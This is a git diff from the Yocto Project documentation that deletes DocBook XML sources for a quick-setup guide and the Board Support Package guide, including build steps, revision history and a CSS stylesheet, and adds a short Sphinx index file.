-            Project related repositories, see the
-            "<ulink url='&YOCTO_DOCS_DEV_URL;#locating-yocto-project-source-files'>Locating Yocto Project Source Files</ulink>"
-            section in the Yocto Project Development Tasks Manual.
-        </para>
-    </section>
-
-    <section id='brief-building-your-image'>
-        <title>Building Your Image</title>
-
-        <para>
-            Use the following steps to build your image.
-            The build process creates an entire Linux distribution, including
-            the toolchain, from source.
-            <note>
-                <itemizedlist>
-                    <listitem><para>
-                        If you are working behind a firewall and your build
-                        host is not set up for proxies, you could encounter
-                        problems with the build process when fetching source
-                        code (e.g. fetcher failures or Git failures).
-                        </para></listitem>
-                    <listitem><para>
-                        If you do not know your proxy settings, consult your
-                        local network infrastructure resources and get that
-                        information.
-                        A good starting point could also be to check your
-                        web browser settings.
-                        Finally, you can find more information on the
-                        "<ulink url='https://wiki.yoctoproject.org/wiki/Working_Behind_a_Network_Proxy'>Working Behind a Network Proxy</ulink>"
-                        page of the Yocto Project Wiki.
-                        </para></listitem>
-                </itemizedlist>
-            </note>
-        </para>
-
-        <para>
-            <orderedlist>
-                <listitem><para>
-                    <emphasis>Initialize the Build Environment:</emphasis>
-                    From within the <filename>poky</filename> directory, run the
-                    <ulink url='&YOCTO_DOCS_REF_URL;#structure-core-script'><filename>&OE_INIT_FILE;</filename></ulink>
-                    environment setup script to define Yocto Project's
-                    build environment on your build host.
-                    <literallayout class='monospaced'>
-     $ cd ~/poky
-     $ source &OE_INIT_FILE;
-     You had no conf/local.conf file. This configuration file has therefore been
-     created for you with some default values. You may wish to edit it to, for
-     example, select a different MACHINE (target hardware). See conf/local.conf
-     for more information as common configuration options are commented.
-
-     You had no conf/bblayers.conf file. This configuration file has therefore been
-     created for you with some default values. To add additional metadata layers
-     into your configuration please add entries to conf/bblayers.conf.
-
-     The Yocto Project has extensive documentation about OE including a reference
-     manual which can be found at:
-         http://yoctoproject.org/documentation
-
-     For more information about OpenEmbedded see their website:
-         http://www.openembedded.org/
-
-
-     ### Shell environment set up for builds. ###
-
-     You can now run 'bitbake &lt;target&gt;'
-
-     Common targets are:
-         core-image-minimal
-         core-image-sato
-         meta-toolchain
-         meta-ide-support
-
-     You can also run generated qemu images with a command like 'runqemu qemux86-64'
-                    </literallayout>
-                    Among other things, the script creates the
-                    <ulink url='&YOCTO_DOCS_REF_URL;#build-directory'>Build Directory</ulink>,
-                    which is <filename>build</filename> in this case
-                    and is located in the
-                    <ulink url='&YOCTO_DOCS_REF_URL;#source-directory'>Source Directory</ulink>.
-                    After the script runs, your current working directory
-                    is set to the Build Directory.
-                    Later, when the build completes, the Build Directory
-                    contains all the files created during the build.
-                    </para></listitem>
-                <listitem><para id='conf-file-step'>
-                    <emphasis>Examine Your Local Configuration File:</emphasis>
-                    When you set up the build environment, a local
-                    configuration file named
-                    <filename>local.conf</filename> becomes available in
-                    a <filename>conf</filename> subdirectory of the
-                    Build Directory.
-                    For this example, the defaults are set to build
-                    for a <filename>qemux86</filename> target, which is
-                    suitable for emulation.
-                    The package manager used is set to the RPM package
-                    manager.
-                    <tip>
-                        You can significantly speed up your build and guard
-                        against fetcher failures by using mirrors.
-                        To use mirrors, add these lines to your
-                        <filename>local.conf</filename> file in the Build
-                        directory:
-                        <literallayout class='monospaced'>
-     SSTATE_MIRRORS = "\
-     file://.* http://sstate.yoctoproject.org/dev/PATH;downloadfilename=PATH \n \
-     file://.* http://sstate.yoctoproject.org/&YOCTO_DOC_VERSION_MINUS_ONE;/PATH;downloadfilename=PATH \n \
-     file://.* http://sstate.yoctoproject.org/&YOCTO_DOC_VERSION;/PATH;downloadfilename=PATH \n \
-     "
-                        </literallayout>
-                        The previous examples showed how to add sstate
-                        paths for Yocto Project &YOCTO_DOC_VERSION_MINUS_ONE;,
-                        &YOCTO_DOC_VERSION;, and a development area.
-                        For a complete index of sstate locations, see
-                        <ulink url='http://sstate.yoctoproject.org/'></ulink>.
-                    </tip>
-                    </para></listitem>
-                <listitem><para>
-                    <emphasis>Start the Build:</emphasis>
-                    Continue with the following command to build an OS image
-                    for the target, which is
-                    <filename>core-image-sato</filename> in this example:
-                    <literallayout class='monospaced'>
-     $ bitbake core-image-sato
-                    </literallayout>
-                    For information on using the
-                    <filename>bitbake</filename> command, see the
-                    "<ulink url='&YOCTO_DOCS_OM_URL;#usingpoky-components-bitbake'>BitBake</ulink>"
-                    section in the Yocto Project Overview and Concepts Manual,
-                    or see the
-                    "<ulink url='&YOCTO_DOCS_BB_URL;#bitbake-user-manual-command'>BitBake Command</ulink>"
-                    section in the BitBake User Manual.
-                    </para></listitem>
-                <listitem><para>
-                    <emphasis>Simulate Your Image Using QEMU:</emphasis>
-                    Once this particular image is built, you can start
-                    QEMU, which is a Quick EMUlator that ships with
-                    the Yocto Project:
-                    <literallayout class='monospaced'>
-     $ runqemu qemux86-64
-                    </literallayout>
-                    If you want to learn more about running QEMU, see the
-                    "<ulink url="&YOCTO_DOCS_DEV_URL;#dev-manual-qemu">Using the Quick EMUlator (QEMU)</ulink>"
-                    chapter in the Yocto Project Development Tasks Manual.
-                    </para></listitem>
-                <listitem><para>
-                    <emphasis>Exit QEMU:</emphasis>
-                    Exit QEMU by either clicking on the shutdown icon or by
-                    typing <filename>Ctrl-C</filename> in the QEMU
-                    transcript window from which you evoked QEMU.
-                    </para></listitem>
-            </orderedlist>
-        </para>
-    </section>
-
-    <section id='customizing-your-build-for-specific-hardware'>
-        <title>Customizing Your Build for Specific Hardware</title>
-
-        <para>
-            So far, all you have done is quickly built an image suitable
-            for emulation only.
-            This section shows you how to customize your build for specific
-            hardware by adding a hardware layer into the Yocto Project
-            development environment.
-        </para>
-
-        <para>
-            In general, layers are repositories that contain related sets of
-            instructions and configurations that tell the Yocto Project what
-            to do.
-            Isolating related metadata into functionally specific layers
-            facilitates modular development and makes it easier to reuse the
-            layer metadata.
-            <note>
-                By convention, layer names start with the string "meta-".
-            </note>
-        </para>
-
-        <para>
-            Follow these steps to add a hardware layer:
-            <orderedlist>
-                <listitem><para>
-                    <emphasis>Find a Layer:</emphasis>
-                    Lots of hardware layers exist.
-                    The Yocto Project
-                    <ulink url='&YOCTO_GIT_URL;'>Source Repositories</ulink>
-                    has many hardware layers.
-                    This example adds the
-                    <ulink url='https://github.com/kraj/meta-altera'>meta-altera</ulink>
-                    hardware layer.
-                    </para></listitem>
-                <listitem><para>
-                    <emphasis>Clone the Layer</emphasis>
-                    Use Git to make a local copy of the layer on your machine.
-                    You can put the copy in the top level of the copy of the
-                    Poky repository created earlier:
-                    <literallayout class='monospaced'>
-     $ cd ~/poky
-     $ git clone https://github.com/kraj/meta-altera.git
-     Cloning into 'meta-altera'...
-     remote: Counting objects: 25170, done.
-     remote: Compressing objects: 100% (350/350), done.
-     remote: Total 25170 (delta 645), reused 719 (delta 538), pack-reused 24219
-     Receiving objects: 100% (25170/25170), 41.02 MiB | 1.64 MiB/s, done.
-     Resolving deltas: 100% (13385/13385), done.
-     Checking connectivity... done.
-                    </literallayout>
-                    The hardware layer now exists with other layers inside
-                    the Poky reference repository on your build host as
-                    <filename>meta-altera</filename> and contains all the
-                    metadata needed to support hardware from Altera, which
-                    is owned by Intel.
-                    </para></listitem>
-                <listitem><para>
-                    <emphasis>Change the Configuration to Build for a Specific Machine:</emphasis>
-                    The
-                    <ulink url='&YOCTO_DOCS_REF_URL;#var-MACHINE'><filename>MACHINE</filename></ulink>
-                    variable in the <filename>local.conf</filename> file
-                    specifies the machine for the build.
-                    For this example, set the <filename>MACHINE</filename>
-                    variable to "cyclone5".
-                    These configurations are used:
-                    <ulink url='https://github.com/kraj/meta-altera/blob/master/conf/machine/cyclone5.conf'></ulink>.
-                    <note>
-                        See the
-                        "<link linkend='conf-file-step'>Examine Your Local Configuration File</link>"
-                        step earlier for more information on configuring the
-                        build.
-                    </note>
-                    </para></listitem>
-                <listitem><para>
-                    <emphasis>Add Your Layer to the Layer Configuration File:</emphasis>
-                    Before you can use a layer during a build, you must add it
-                    to your <filename>bblayers.conf</filename> file, which
-                    is found in the
-                    <ulink url='&YOCTO_DOCS_REF_URL;#build-directory'>Build Directory's</ulink>
-                    <filename>conf</filename> directory.</para>
-
-                    <para>Use the <filename>bitbake-layers add-layer</filename>
-                    command to add the layer to the configuration file:
-                    <literallayout class='monospaced'>
-     $ cd ~/poky/build
-     $ bitbake-layers add-layer ../meta-altera
-     NOTE: Starting bitbake server...
-     Parsing recipes: 100% |##################################################################| Time: 0:00:32
-     Parsing of 918 .bb files complete (0 cached, 918 parsed). 1401 targets, 123 skipped, 0 masked, 0 errors.
-                    </literallayout>
-                    You can find more information on adding layers in the
-                    "<ulink url='&YOCTO_DOCS_DEV_URL;#adding-a-layer-using-the-bitbake-layers-script'>Adding a Layer Using the <filename>bitbake-layers</filename> Script</ulink>"
-                    section.
-                    </para></listitem>
-            </orderedlist>
-            Completing these steps has added the
-            <filename>meta-altera</filename> layer to your Yocto Project
-            development environment and configured it to build for the
-            "cyclone5" machine.
-            <note>
-                The previous steps are for demonstration purposes only.
-                If you were to attempt to build an image for the
-                "cyclone5" build, you should read the Altera
-                <filename>README</filename>.
-            </note>
-        </para>
-    </section>
-
-    <section id='creating-your-own-general-layer'>
-        <title>Creating Your Own General Layer</title>
-
-        <para>
-            Maybe you have an application or specific set of behaviors you
-            need to isolate.
-            You can create your own general layer using the
-            <filename>bitbake-layers create-layer</filename> command.
-            The tool automates layer creation by setting up a
-            subdirectory with a <filename>layer.conf</filename>
-            configuration file, a <filename>recipes-example</filename>
-            subdirectory that contains an <filename>example.bb</filename>
-            recipe, a licensing file, and a <filename>README</filename>.
-        </para>
-
-        <para>
-            The following commands run the tool to create a layer named
-            <filename>meta-mylayer</filename> in the
-            <filename>poky</filename> directory:
-            <literallayout class='monospaced'>
-     $ cd ~/poky
-     $ bitbake-layers create-layer meta-mylayer
-     NOTE: Starting bitbake server...
-     Add your new layer with 'bitbake-layers add-layer meta-mylayer'
-            </literallayout>
-            For more information on layers and how to create them, see the
-            "<ulink url='&YOCTO_DOCS_DEV_URL;#creating-a-general-layer-using-the-bitbake-layers-script'>Creating a General Layer Using the <filename>bitbake-layers</filename> Script</ulink>"
-            section in the Yocto Project Development Tasks Manual.
-        </para>
-    </section>
-
-    <section id='brief-where-to-go-next'>
-        <title>Where To Go Next</title>
-
-        <para>
-            Now that you have experienced using the Yocto Project, you might
-            be asking yourself "What now?"
-            The Yocto Project has many sources of information including
-            the website, wiki pages, and user manuals:
-            <itemizedlist>
-                <listitem><para>
-                    <emphasis>Website:</emphasis>
-                    The
-                    <ulink url='&YOCTO_HOME_URL;'>Yocto Project Website</ulink>
-                    provides background information, the latest builds,
-                    breaking news, full development documentation, and
-                    access to a rich Yocto Project Development Community
-                    into which you can tap.
-                    </para></listitem>
-                <listitem><para>
-                    <emphasis>Developer Screencast:</emphasis>
-                    The
-                    <ulink url='http://vimeo.com/36450321'>Getting Started with the Yocto Project - New Developer Screencast Tutorial</ulink>
-                    provides a 30-minute video created for users unfamiliar
-                    with the Yocto Project but familiar with Linux build
-                    hosts.
-                    While this screencast is somewhat dated, the
-                    introductory and fundamental concepts are useful for
-                    the beginner.
-                    </para></listitem>
-                <listitem><para>
-                    <emphasis>Yocto Project Overview and Concepts Manual:</emphasis>
-                    The
-                    <ulink url='&YOCTO_DOCS_OM_URL;'>Yocto Project Overview and Concepts Manual</ulink>
-                    is a great place to start to learn about the
-                    Yocto Project.
-                    This manual introduces you to the Yocto Project and its
-                    development environment.
-                    The manual also provides conceptual information for
-                    various aspects of the Yocto Project.
-                    </para></listitem>
-                <listitem><para>
-                    <emphasis>Yocto Project Wiki:</emphasis>
-                    The
-                    <ulink url='&YOCTO_WIKI_URL;'>Yocto Project Wiki</ulink>
-                    provides additional information on where to go next
-                    when ramping up with the Yocto Project, release
-                    information, project planning, and QA information.
-                    </para></listitem>
-                <listitem><para>
-                    <emphasis>Yocto Project Mailing Lists:</emphasis>
-                    Related mailing lists provide a forum for discussion,
-                    patch submission and announcements.
-                    Several mailing lists exist and are grouped according
-                    to areas of concern.
-                    See the
-                    "<ulink url='&YOCTO_DOCS_REF_URL;#resources-mailinglist'>Mailing lists</ulink>"
-                    section in the Yocto Project Reference Manual for a
-                    complete list of Yocto Project mailing lists.
-                    </para></listitem>
-                <listitem><para>
-                    <emphasis>Comprehensive List of Links and Other Documentation:</emphasis>
-                    The
-                    "<ulink url='&YOCTO_DOCS_REF_URL;#resources-links-and-related-documentation'>Links and Related Documentation</ulink>"
-                    section in the Yocto Project Reference Manual provides a
-                    comprehensive list of all related links and other
-                    user documentation.
-                    </para></listitem>
-            </itemizedlist>
-        </para>
-    </section>
-</article>
-<!--
-vim: expandtab tw=80 ts=4
--->
diff --git a/documentation/bsp-guide/bsp-guide-customization.xsl b/documentation/bsp-guide/bsp-guide-customization.xsl
deleted file mode 100644
index de674a0aec..0000000000
--- a/documentation/bsp-guide/bsp-guide-customization.xsl
+++ /dev/null
@@ -1,27 +0,0 @@
-<?xml version='1.0'?>
-<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns="http://www.w3.org/1999/xhtml" xmlns:fo="http://www.w3.org/1999/XSL/Format" version="1.0">
-
-  <xsl:import href="http://downloads.yoctoproject.org/mirror/docbook-mirror/docbook-xsl-1.76.1/xhtml/docbook.xsl" />
-
-<!--
-
-  <xsl:import href="../template/1.76.1/docbook-xsl-1.76.1/xhtml/docbook.xsl" />
-
-  <xsl:import href="http://docbook.sourceforge.net/release/xsl/1.76.1/xhtml/docbook.xsl" />
-
--->
-
-  <xsl:include href="../template/permalinks.xsl"/>
-  <xsl:include href="../template/section.title.xsl"/>
-  <xsl:include href="../template/component.title.xsl"/>
-  <xsl:include href="../template/division.title.xsl"/>
-  <xsl:include href="../template/formal.object.heading.xsl"/>
-
-  <xsl:param name="html.stylesheet" select="'bsp-style.css'" />
-  <xsl:param name="chapter.autolabel" select="1" />
-  <xsl:param name="appendix.autolabel" select="A" />
-  <xsl:param name="section.autolabel" select="1" />
-  <xsl:param name="section.label.includes.component.label" select="1" />
-  <xsl:param name="generate.id.attributes" select="1" />
-
-</xsl:stylesheet>
diff --git a/documentation/bsp-guide/bsp-guide.rst b/documentation/bsp-guide/bsp-guide.rst
new file mode 100644
index 0000000000..a4394a85ed
--- /dev/null
+++ b/documentation/bsp-guide/bsp-guide.rst
@@ -0,0 +1,16 @@
+.. SPDX-License-Identifier: CC-BY-SA-2.0-UK
+
+=====================================================
+Yocto Project Board Support Package Developer's Guide
+=====================================================
+
+|
+
+.. toctree::
+   :caption: Table of Contents
+   :numbered:
+
+   bsp
+   history
+
+.. include:: /boilerplate.rst
diff --git a/documentation/bsp-guide/bsp-guide.xml b/documentation/bsp-guide/bsp-guide.xml
deleted file mode 100755
index eec048e021..0000000000
--- a/documentation/bsp-guide/bsp-guide.xml
+++ /dev/null
@@ -1,221 +0,0 @@
-<!DOCTYPE book PUBLIC "-//OASIS//DTD DocBook XML V4.2//EN"
-"http://www.oasis-open.org/docbook/xml/4.2/docbookx.dtd"
-[<!ENTITY % poky SYSTEM "../poky.ent"> %poky; ] >
-
-<book id='bsp-guide' lang='en'
-      xmlns:xi="http://www.w3.org/2003/XInclude"
-      xmlns="http://docbook.org/ns/docbook"
-      >
-    <bookinfo>
-
-        <mediaobject>
-            <imageobject>
-                <imagedata fileref='figures/bsp-title.png'
-                    format='SVG'
-                    align='center' scalefit='1' width='100%'/>
-            </imageobject>
-        </mediaobject>
-
-        <title>
-            Yocto Project Board Support Package Developer's Guide
-        </title>
-
-        <authorgroup>
-            <author>
-                <affiliation>
-                    <orgname>&ORGNAME;</orgname>
-                </affiliation>
-                <email>&ORGEMAIL;</email>
-            </author>
-        </authorgroup>
-
-        <revhistory>
-            <revision>
-                <revnumber>0.9</revnumber>
-                <date>November 2010</date>
-                <revremark>The initial document released with the Yocto Project 0.9 Release.</revremark>
-            </revision>
-            <revision>
-                <revnumber>1.0</revnumber>
-                <date>April 2011</date>
-                <revremark>Released with the Yocto Project 1.0 Release.</revremark>
-            </revision>
-            <revision>
-                <revnumber>1.1</revnumber>
-                <date>October 2011</date>
-                <revremark>Released with the Yocto Project 1.1 Release.</revremark>
-            </revision>
-            <revision>
-                <revnumber>1.2</revnumber>
-                <date>April 2012</date>
-                <revremark>Released with the Yocto Project 1.2 Release.</revremark>
-            </revision>
-            <revision>
-                <revnumber>1.3</revnumber>
-                <date>October 2012</date>
-                <revremark>Released with the Yocto Project 1.3 Release.</revremark>
-            </revision>
-            <revision>
-                <revnumber>1.4</revnumber>
-                <date>April 2013</date>
-                <revremark>Released with the Yocto Project 1.4 Release.</revremark>
-            </revision>
-            <revision>
-                <revnumber>1.5</revnumber>
-                <date>October 2013</date>
-                <revremark>Released with the Yocto Project 1.5 Release.</revremark>
-            </revision>
-            <revision>
-                <revnumber>1.6</revnumber>
-                <date>April 2014</date>
-                <revremark>Released with the Yocto Project 1.6 Release.</revremark>
-            </revision>
-            <revision>
-                <revnumber>1.7</revnumber>
-                <date>October 2014</date>
-                <revremark>Released with the Yocto Project 1.7 Release.</revremark>
-            </revision>
-            <revision>
-                <revnumber>1.8</revnumber>
-                <date>April 2015</date>
-                <revremark>Released with the Yocto Project 1.8 Release.</revremark>
-            </revision>
-            <revision>
-                <revnumber>2.0</revnumber>
-                <date>October 2015</date>
-                <revremark>Released with the Yocto Project 2.0 Release.</revremark>
-            </revision>
-            <revision>
-                <revnumber>2.1</revnumber>
-                <date>April 2016</date>
-                <revremark>Released with the Yocto Project 2.1 Release.</revremark>
-            </revision>
-            <revision>
-                <revnumber>2.2</revnumber>
-                <date>October 2016</date>
-                <revremark>Released with the Yocto Project 2.2 Release.</revremark>
-            </revision>
-            <revision>
-                <revnumber>2.3</revnumber>
-                <date>May 2017</date>
-                <revremark>Released with the Yocto Project 2.3 Release.</revremark>
-            </revision>
-            <revision>
-                <revnumber>2.4</revnumber>
-                <date>October 2017</date>
-                <revremark>Released with the Yocto Project 2.4 Release.</revremark>
-            </revision>
-            <revision>
-                <revnumber>2.5</revnumber>
-                <date>May 2018</date>
-                <revremark>Released with the Yocto Project 2.5 Release.</revremark>
-            </revision>
-            <revision>
-                <revnumber>2.6</revnumber>
-                <date>November 2018</date>
-                <revremark>Released with the Yocto Project 2.6 Release.</revremark>
-            </revision>
-            <revision>
-                <revnumber>2.7</revnumber>
-                <date>May 2019</date>
-                <revremark>Released with the Yocto Project 2.7 Release.</revremark>
-            </revision>
-            <revision>
-                <revnumber>3.0</revnumber>
-                <date>October 2019</date>
-                <revremark>Released with the Yocto Project 3.0 Release.</revremark>
-            </revision>
-            <revision>
-                <revnumber>3.1</revnumber>
-                <date>April 2020</date>
-                <revremark>Released with the Yocto Project 3.1 Release.</revremark>
-            </revision>
-            <revision>
-                <revnumber>3.1.1</revnumber>
-                <date>June 2020</date>
-                <revremark>Released with the Yocto Project 3.1.1 Release.</revremark>
-            </revision>
-            <revision>
-                <revnumber>3.1.2</revnumber>
-                <date>August 2020</date>
-                <revremark>Released with the Yocto Project 3.1.2 Release.</revremark>
-            </revision>
-            <revision>
-                <revnumber>3.1.3</revnumber>
-                <date>October 2020</date>
-                <revremark>Released with the Yocto Project 3.1.3 Release.</revremark>
-            </revision>
-            <revision>
-                <revnumber>3.1.4</revnumber>
-                <date>&REL_MONTH_YEAR;</date>
-                <revremark>Released with the Yocto Project 3.1.4 Release.</revremark>
-            </revision>
-        </revhistory>
-
-    <copyright>
-      <year>&COPYRIGHT_YEAR;</year>
-      <holder>Linux Foundation</holder>
-    </copyright>
-
-    <legalnotice>
-      <para>
-        Permission is granted to copy, distribute and/or modify this document under
-        the terms of the <ulink type="http" url="http://creativecommons.org/licenses/by-nc-sa/2.0/uk/">Creative Commons Attribution-Share Alike 2.0 UK: England &amp; Wales</ulink> as published by Creative Commons.
-      </para>
-           <note><title>Manual Notes</title>
-               <itemizedlist>
-                   <listitem><para>
-                       This version of the
-                       <emphasis>Yocto Project Board Support Package (BSP) Developer's Guide</emphasis>
-                       is for the &YOCTO_DOC_VERSION; release of the
-                       Yocto Project.
-                       To be sure you have the latest version of the manual
-                       for this release, go to the
-                       <ulink url='&YOCTO_DOCS_URL;'>Yocto Project documentation page</ulink>
-                       and select the manual from that site.
-                       Manuals from the site are more up-to-date than manuals
-                       derived from the Yocto Project released TAR files.
-                       </para></listitem>
-                   <listitem><para>
-                       If you located this manual through a web search, the
-                       version of the manual might not be the one you want
-                       (e.g. the search might have returned a manual much
-                       older than the Yocto Project version with which you
-                       are working).
-                       You can see all Yocto Project major releases by
-                       visiting the
-                       <ulink url='&YOCTO_WIKI_URL;/wiki/Releases'>Releases</ulink>
-                       page.
-                       If you need a version of this manual for a different
-                       Yocto Project release, visit the
-                       <ulink url='&YOCTO_DOCS_URL;'>Yocto Project documentation page</ulink>
-                       and select the manual set by using the
-                       "ACTIVE RELEASES DOCUMENTATION" or "DOCUMENTS ARCHIVE"
-                       pull-down menus.
-                       </para></listitem>
-                   <listitem>
-                       <para>
-                       To report any inaccuracies or problems with this
-                       (or any other Yocto Project) manual, send an email to
-                       the Yocto Project documentation mailing list at
-                       <filename>docs@lists.yoctoproject.org</filename> or
-                       log into the freenode <filename>#yocto</filename> channel.
-                       </para>
-                   </listitem>
-               </itemizedlist>
-           </note>
-    </legalnotice>
-
-    </bookinfo>
-
-    <xi:include href="bsp.xml"/>
-
-<!--    <index id='index'>
-      <title>Index</title>
-    </index>
--->
-
-</book>
-<!--
-vim: expandtab tw=80 ts=4
--->
diff --git a/documentation/bsp-guide/bsp-style.css b/documentation/bsp-guide/bsp-style.css
deleted file mode 100644
index 0c8689b96f..0000000000
--- a/documentation/bsp-guide/bsp-style.css
+++ /dev/null
@@ -1,987 +0,0 @@
-/*
-   Generic XHTML / DocBook XHTML CSS Stylesheet.
-
-   Browser wrangling and typographic design by
-      Oyvind Kolas / pippin@gimp.org
-
-   Customised for Poky by
-      Matthew Allum / mallum@o-hand.com
-
-   Thanks to:
-     Liam R. E. Quin
-     William Skaggs
-     Jakub Steiner
-
-   Structure
-   ---------
-
-   The stylesheet is divided into the following sections:
-
-       Positioning
-          Margins, paddings, width, font-size, clearing.
-       Decorations
-          Borders, style
-       Colors
-          Colors
-       Graphics
-          Graphical backgrounds
-       Nasty IE tweaks
-          Workarounds needed to make it work in internet explorer,
-          currently makes the stylesheet non validating, but up until
-          this point it is validating.
-       Mozilla extensions
-          Transparency for footer
-	  Rounded corners on boxes
-
-*/
-
-
-  /*************** /
- /  Positioning   /
-/ ***************/
-
-body {
-  font-family: Verdana, Sans, sans-serif;
-
-  min-width: 640px;
-  width: 80%;
-  margin:  0em auto;
-  padding: 2em 5em 5em 5em;
-  color: #333;
-}
-
-h1,h2,h3,h4,h5,h6,h7 {
-  font-family: Arial, Sans;
-  color: #00557D;
-  clear: both;
-}
-
-h1 {
-  font-size: 2em;
-  text-align: left;
-  padding: 0em 0em 0em 0em;
-  margin: 2em 0em 0em 0em;
-}
-
-h2.subtitle {
-  margin: 0.10em 0em 3.0em 0em;
-  padding: 0em 0em 0em 0em;
-  font-size: 1.8em;
-  padding-left: 20%;
-  font-weight: normal;
-  font-style: italic;
-}
-
-h2 {
-  margin: 2em 0em 0.66em 0em;
-  padding: 0.5em 0em 0em 0em;
-  font-size: 1.5em;
-  font-weight: bold;
-}
-
-h3.subtitle {
-  margin: 0em 0em 1em 0em;
-  padding: 0em 0em 0em 0em;
-  font-size: 142.14%;
-  text-align: right;
-}
-
-h3 {
-  margin: 1em 0em 0.5em 0em;
-  padding: 1em 0em 0em 0em;
-  font-size: 140%;
-  font-weight: bold;
-}
-
-h4 {
-  margin: 1em 0em 0.5em 0em;
-  padding: 1em 0em 0em 0em;
-  font-size: 120%;
-  font-weight: bold;
-}
-
-h5 {
-  margin: 1em 0em 0.5em 0em;
-  padding: 1em 0em 0em 0em;
-  font-size: 110%;
-  font-weight: bold;
-}
-
-h6 {
-  margin: 1em 0em 0em 0em;
-  padding: 1em 0em 0em 0em;
-  font-size: 110%;
-  font-weight: bold;
-}
-
-.authorgroup {
-  background-color: transparent;
-  background-repeat: no-repeat;
-  padding-top: 256px;
-  background-image: url("figures/bsp-title.png");
-  background-position: left top;
-  margin-top: -256px;
-  padding-right: 50px;
-  margin-left: 0px;
-  text-align: right;
-  width: 740px;
-}
-
-h3.author {
-  margin: 0em 0me 0em 0em;
-  padding: 0em 0em 0em 0em;
-  font-weight: normal;
-  font-size: 100%;
-  color: #333;
-  clear: both;
-}
-
-.author tt.email {
-  font-size: 66%;
-}
-
-.titlepage hr {
-  width: 0em;
-  clear: both;
-}
-
-.revhistory {
-  padding-top: 2em;
-  clear: both;
-}
-
-.toc,
-.list-of-tables,
-.list-of-examples,
-.list-of-figures {
-  padding: 1.33em 0em 2.5em 0em;
-  color: #00557D;
-}
-
-.toc p,
-.list-of-tables p,
-.list-of-figures p,
-.list-of-examples p {
-  padding: 0em 0em 0em 0em;
-  padding: 0em 0em 0.3em;
-  margin: 1.5em 0em 0em 0em;
-}
-
-.toc p b,
-.list-of-tables p b,
-.list-of-figures p b,
-.list-of-examples p b{
-  font-size: 100.0%;
-  font-weight: bold;
-}
-
-.toc dl,
-.list-of-tables dl,
-.list-of-figures dl,
-.list-of-examples dl {
-  margin: 0em 0em 0.5em 0em;
-  padding: 0em 0em 0em 0em;
-}
-
-.toc dt {
-  margin: 0em 0em 0em 0em;
-  padding: 0em 0em 0em 0em;
-}
-
-.toc dd {
-  margin: 0em 0em 0em 2.6em;
-  padding: 0em 0em 0em 0em;
-}
-
-div.glossary dl,
-div.variablelist dl {
-}
-
-.glossary dl dt,
-.variablelist dl dt,
-.variablelist dl dt span.term {
-  font-weight: normal;
-  width: 20em;
-  text-align: right;
-}
-
-.variablelist dl dt {
-  margin-top: 0.5em;
-}
-
-.glossary dl dd,
-.variablelist dl dd {
-  margin-top: -1em;
-  margin-left: 25.5em;
-}
-
-.glossary dd p,
-.variablelist dd p {
-  margin-top: 0em;
-  margin-bottom: 1em;
-}
-
-
-div.calloutlist table td {
-  padding: 0em 0em 0em 0em;
-  margin: 0em 0em 0em 0em;
-}
-
-div.calloutlist table td p {
-  margin-top: 0em;
-  margin-bottom: 1em;
-}
-
-div p.copyright {
-  text-align: left;
-}
-
-div.legalnotice p.legalnotice-title {
-  margin-bottom: 0em;
-}
-
-p {
-  line-height: 1.5em;
-  margin-top: 0em;
-
-}
-
-dl {
-  padding-top: 0em;
-}
-
-hr {
-  border: solid 1px;
-}
-
-
-.mediaobject,
-.mediaobjectco {
-  text-align: center;
-}
-
-img {
-  border: none;
-}
-
-ul {
-  padding: 0em 0em 0em 1.5em;
-}
-
-ul li {
-  padding: 0em 0em 0em 0em;
-}
-
-ul li p {
-  text-align: left;
-}
-
-table {
-  width :100%;
-}
-
-th {
-  padding: 0.25em;
-  text-align: left;
-  font-weight: normal;
-  vertical-align: top;
-}
-
-td {
-  padding: 0.25em;
-  vertical-align: top;
-}
-
-p a[id] {
-  margin: 0px;
-  padding: 0px;
-  display: inline;
-  background-image: none;
-}
-
-a {
-  text-decoration: underline;
-  color: #444;
-}
-
-pre {
-    overflow: auto;
-}
-
-a:hover {
-  text-decoration: underline;
-  /*font-weight: bold;*/
-}
-
-/* This style defines how the permalink character
-   appears by itself and when hovered over with
-   the mouse. */
-
-[alt='Permalink'] { color: #eee; }
-[alt='Permalink']:hover { color: black; }
-
-
-div.informalfigure,
-div.informalexample,
-div.informaltable,
-div.figure,
-div.table,
-div.example {
-  margin: 1em 0em;
-  padding: 1em;
-  page-break-inside: avoid;
-}
-
-
-div.informalfigure p.title b,
-div.informalexample p.title b,
-div.informaltable p.title b,
-div.figure p.title b,
-div.example p.title b,
-div.table p.title b{
-    padding-top: 0em;
-    margin-top: 0em;
-    font-size: 100%;
-    font-weight: normal;
-}
-
-.mediaobject .caption,
-.mediaobject .caption p  {
-  text-align: center;
-  font-size: 80%;
-  padding-top: 0.5em;
-  padding-bottom: 0.5em;
-}
-
-.epigraph {
-  padding-left: 55%;
-  margin-bottom: 1em;
-}
-
-.epigraph p {
-  text-align: left;
-}
-
-.epigraph .quote {
-  font-style: italic;
-}
-.epigraph .attribution {
-  font-style: normal;
-  text-align: right;
-}
-
-span.application {
-  font-style: italic;
-}
-
-.programlisting {
-  font-family: monospace;
-  font-size: 80%;
-  white-space: pre;
-  margin: 1.33em 0em;
-  padding: 1.33em;
-}
-
-.tip,
-.warning,
-.caution,
-.note {
-  margin-top: 1em;
-  margin-bottom: 1em;
-
-}
-
-/* force full width of table within div */
-.tip table,
-.warning table,
-.caution table,
-.note table {
-  border: none;
-  width: 100%;
-}
-
-
-.tip table th,
-.warning table th,
-.caution table th,
-.note table th {
-  padding: 0.8em 0.0em 0.0em 0.0em;
-  margin : 0em 0em 0em 0em;
-}
-
-.tip p,
-.warning p,
-.caution p,
-.note p {
-  margin-top: 0.5em;
-  margin-bottom: 0.5em;
-  padding-right: 1em;
-  text-align: left;
-}
-
-.acronym {
-  text-transform: uppercase;
-}
-
-b.keycap,
-.keycap {
-  padding: 0.09em 0.3em;
-  margin: 0em;
-}
-
-.itemizedlist li {
-  clear: none;
-}
-
-.filename {
-  font-size: medium;
-  font-family: Courier, monospace;
-}
-
-
-div.navheader, div.heading{
-  position: absolute;
-  left: 0em;
-  top: 0em;
-  width: 100%;
-  background-color: #cdf;
-  width: 100%;
-}
-
-div.navfooter, div.footing{
-  position: fixed;
-  left: 0em;
-  bottom: 0em;
-  background-color: #eee;
-  width: 100%;
-}
-
-
-div.navheader td,
-div.navfooter td {
-  font-size: 66%;
-}
-
-div.navheader table th {
-  /*font-family: Georgia, Times, serif;*/
-  /*font-size: x-large;*/
-  font-size: 80%;
-}
-
-div.navheader table {
